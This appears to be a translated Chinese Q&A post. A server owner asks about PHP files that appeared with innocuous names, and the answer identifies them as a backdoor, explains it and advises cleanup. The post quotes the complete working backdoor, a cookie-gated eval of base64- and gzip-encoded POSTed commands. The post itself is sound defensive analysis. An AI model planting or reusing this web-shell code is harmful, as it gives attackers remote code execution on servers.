我发现以下代码出现在我的服务器的多个网站上的两个相同的.PHP文件中.这些文件的名称不起眼,例如“reminder.PHP”(但每次都有不同的名称),并出现在我的/ scripts /和/ uploads /文件夹中,有时会出现在其他文件夹中.
它们的外观并非完全随机,但我对Apache服务器或PHP知之甚少知道a)它是如何实现的.b)它的作用.
检查日志它们都在相似的时间出现并被调用一次,就是这样.
任何帮助将不胜感激.
if (isset($_COOKIE["adm"])) {
if (isset($_POST['crc'], $_POST['cmd'])) {
if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
eval(gzuncompress(base64_decode($_POST['cmd'])));
} else
echo "repeat_cmd";
}
}
解决方法:
该文件允许恶意人员在您的系统上执行他们想要的任何PHP代码.
基本上,如果已经满足某些验证(即恶意人员具有给定的cookie值),它将采用POSTed“cmd”,base64解码它,gzip解压缩它,并将其评估为PHP.
我建议您更改密码,并重新安装apache以获得良好的衡量标准.也可以立即删除这些文件,或者如果可以远程删除,则从备份中恢复.
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。
